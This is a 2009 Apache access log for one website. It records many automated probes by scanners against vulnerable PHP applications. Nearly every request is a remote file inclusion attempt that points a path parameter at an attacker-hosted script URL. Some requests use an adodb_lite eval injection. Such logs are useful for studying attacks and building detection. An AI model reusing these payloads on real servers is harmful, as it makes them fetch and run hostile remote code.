80.237.155.83 - - [04/Jul/2009:14:10:06 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://for.caucasus.net/os.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
80.237.155.83 - - [04/Jul/2009:14:10:06 -0700] "GET /include/bbs.lib.inc.php?site_path=http://for.caucasus.net/os.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:14:10:13 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:14:10:13 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:14:10:13 -0700] "GET /logs/access.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:14:10:14 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:14:10:14 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:14:10:14 -0700] "GET /logs/access.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
87.10.191.220 - - [04/Jul/2009:14:10:40 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.erics.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
87.10.191.220 - - [04/Jul/2009:14:10:40 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.erics.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
87.10.191.220 - - [04/Jul/2009:14:10:40 -0700] "GET /logs/access.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.erics.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:14:12:03 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:14:12:17 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:14:13:43 -0700] "GET //include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:14:13:43 -0700] "GET //include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:14:13:43 -0700] "GET /logs///include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:14:13:43 -0700] "GET /logs/access.log///include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:14:13:43 -0700] "GET /logs///include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:14:13:44 -0700] "GET /logs/access.log///include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:14:13:49 -0700] "GET //include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:14:13:49 -0700] "GET /logs///include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:14:13:51 -0700] "GET /logs/access.log///include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:14:14:25 -0700] "GET //include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:14:14:25 -0700] "GET /logs///include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:14:14:26 -0700] "GET /logs/access.log///include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:14:14:31 -0700] "GET //include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:14:14:31 -0700] "GET /logs///include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:14:14:31 -0700] "GET /logs/access.log///include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
121.124.127.34 - - [04/Jul/2009:14:14:53 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
121.124.127.34 - - [04/Jul/2009:14:14:53 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
121.124.127.34 - - [04/Jul/2009:14:14:53 -0700] "GET /include/bbs.lib.inc.php?site_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:14:14:58 -0700] "GET /adminstrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:14:14:58 -0700] "GET /logs/access.log//adminstrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:14:14:58 -0700] "GET /logs//adminstrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:14:16:04 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:14:16:05 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:14:16:05 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:14:16:05 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:14:16:05 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:14:16:05 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:14:18:33 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:14:18:33 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:14:18:42 -0700] "GET /logs/access_090212.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:14:18:46 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:14:18:46 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:14:18:50 -0700] "GET /logs/access_090212.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:14:19:08 -0700] "GET /logs/access.log///include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:14:19:35 -0700] "GET /logs/access.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:14:19:36 -0700] "GET /logs/access.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:14:21:24 -0700] "GET /logs/access.log//include/write.php?dir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
209.51.133.202 - - [04/Jul/2009:14:21:32 -0700] "GET /allopass-error.php?mosConfig_live_site=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
209.51.133.202 - - [04/Jul/2009:14:21:32 -0700] "GET /logs//allopass-error.php?mosConfig_live_site=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
209.51.133.202 - - [04/Jul/2009:14:21:32 -0700] "GET /logs/access.log%20%20//allopass-error.php?mosConfig_live_site=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
85.214.147.206 - - [04/Jul/2009:14:22:55 -0700] "GET /logs/access.log/index.php?body=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:14:23:02 -0700] "GET /logs/access.log/index.php?body=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
217.147.29.190 - - [04/Jul/2009:14:27:13 -0700] "GET /vwar/backup/errors.php?error=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
217.147.29.190 - - [04/Jul/2009:14:27:13 -0700] "GET /logs/access.log%20%20//vwar/backup/errors.php?error=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
217.147.29.190 - - [04/Jul/2009:14:27:13 -0700] "GET /logs//vwar/backup/errors.php?error=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
209.51.133.202 - - [04/Jul/2009:14:28:19 -0700] "GET /logs/access.log//allopass-error.php?mosConfig_live_site=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
80.237.155.83 - - [04/Jul/2009:14:28:44 -0700] "GET /include/bbs.lib.inc.php?site_path=http://for.caucasus.net/os.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
80.237.155.83 - - [04/Jul/2009:14:28:44 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://for.caucasus.net/os.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
80.237.155.83 - - [04/Jul/2009:14:28:44 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://for.caucasus.net/os.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
121.124.127.34 - - [04/Jul/2009:14:31:49 -0700] "GET /include/bbs.lib.inc.php?site_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
121.124.127.34 - - [04/Jul/2009:14:31:49 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
121.124.127.34 - - [04/Jul/2009:14:31:49 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
217.147.29.190 - - [04/Jul/2009:14:34:15 -0700] "GET /logs/access.log//vwar/backup/errors.php?error=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
60.43.229.5 - - [04/Jul/2009:14:35:50 -0700] "GET /logs//allopass-error.php?mosConfig_live_site=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
60.43.229.5 - - [04/Jul/2009:14:35:50 -0700] "GET /logs/access.log%20%20//allopass-error.php?mosConfig_live_site=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
60.43.229.5 - - [04/Jul/2009:14:35:50 -0700] "GET /allopass-error.php?mosConfig_live_site=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
60.43.229.5 - - [04/Jul/2009:14:38:41 -0700] "GET /logs/access.log//allopass-error.php?mosConfig_live_site=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
117.121.208.254 - - [04/Jul/2009:14:52:16 -0700] "GET /logs/access_090212.log/errors.php?error=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.hellionindustries.com"
117.121.208.254 - - [04/Jul/2009:14:52:22 -0700] "GET /errors.php?error=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.hellionindustries.com"
117.121.208.254 - - [04/Jul/2009:14:52:29 -0700] "GET /logs/errors.php?error=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.hellionindustries.com"
209.51.133.202 - - [04/Jul/2009:14:55:26 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
209.51.133.202 - - [04/Jul/2009:14:55:26 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
209.51.133.202 - - [04/Jul/2009:14:55:26 -0700] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
209.51.133.202 - - [04/Jul/2009:14:58:02 -0700] "GET /logs/access.log%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.100.186.87 - - [04/Jul/2009:15:01:53 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.100.186.87 - - [04/Jul/2009:15:01:53 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.100.186.87 - - [04/Jul/2009:15:01:53 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
217.147.29.190 - - [04/Jul/2009:15:03:31 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
217.147.29.190 - - [04/Jul/2009:15:03:31 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
217.147.29.190 - - [04/Jul/2009:15:03:32 -0700] "GET /logs/access.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
74.223.143.131 - - [04/Jul/2009:15:05:18 -0700] "GET /?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "hellionindustries.com"
74.223.143.131 - - [04/Jul/2009:15:05:18 -0700] "GET /logs/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 1510 "-" "Mozilla/5.0" "hellionindustries.com"
74.223.143.131 - - [04/Jul/2009:15:05:18 -0700] "GET /logs/access.log%20%20/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
84.38.65.112 - - [04/Jul/2009:15:06:06 -0700] "GET /?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "hellionindustries.com"
84.38.65.112 - - [04/Jul/2009:15:06:06 -0700] "GET /logs/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 1510 "-" "Mozilla/5.0" "hellionindustries.com"
84.38.65.112 - - [04/Jul/2009:15:06:06 -0700] "GET /logs/access.log%20%20/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.100.186.87 - - [04/Jul/2009:15:06:27 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.100.186.87 - - [04/Jul/2009:15:06:27 -0700] "GET /logs/access.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.100.186.87 - - [04/Jul/2009:15:06:27 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.100.186.87 - - [04/Jul/2009:15:08:11 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
216.75.60.116 - - [04/Jul/2009:15:18:31 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.hellionindustries.com"
216.75.60.116 - - [04/Jul/2009:15:18:31 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.hellionindustries.com"
216.75.60.116 - - [04/Jul/2009:15:18:31 -0700] "GET /logs/access.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.hellionindustries.com"
216.75.60.116 - - [04/Jul/2009:15:18:45 -0700] "GET /logs/access.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.hellionindustries.com"
216.75.60.116 - - [04/Jul/2009:15:18:45 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.hellionindustries.com"
216.75.60.116 - - [04/Jul/2009:15:18:45 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.hellionindustries.com"
84.51.241.6 - - [04/Jul/2009:15:24:54 -0700] "GET /?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "hellionindustries.com"
84.51.241.6 - - [04/Jul/2009:15:24:54 -0700] "GET /logs/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 1510 "-" "Mozilla/5.0" "hellionindustries.com"
